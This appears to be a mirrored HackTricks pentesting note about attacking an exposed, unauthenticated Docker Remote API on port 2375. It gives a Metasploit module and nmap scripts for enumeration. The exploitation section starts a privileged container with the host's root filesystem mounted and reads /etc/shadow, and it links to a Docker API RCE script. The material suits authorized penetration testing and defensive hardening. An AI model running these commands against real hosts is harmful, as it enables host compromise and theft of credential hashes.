1
2
Fork 0
mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00
hacktricks/pentesting/2375-pentesting-docker
Nicolas Krassas 4b9384c19a
2375-pentesting-docker
Adding information on pentesting Docker Remote API
2020-12-15 09:31:28 +02:00

30 lines
951 B
Plaintext

# 2375 - Pentesting Docker API
## Basic Information
Remote API is running by default on 2375 port when enabled. The service by default will not require authentication allowing an attacker to start a priviledged docker container. By using the Remote API one can attach hosts / \(root directory\) to the container and read/write files of the host\'s environment.
**Default port:** 2375
```text
PORT STATE SERVICE
2375/tcp open docker
```
## Enumeration
```bash
msf> use exploit/linux/http/docker_daemon_tcp
nmap -sV --script "docker-*" -p <PORT> <IP>
```
## Exploitation
Check if it's vulnerable to execute arbitrary code:
```text
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cat /mnt/etc/shadow
```
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py)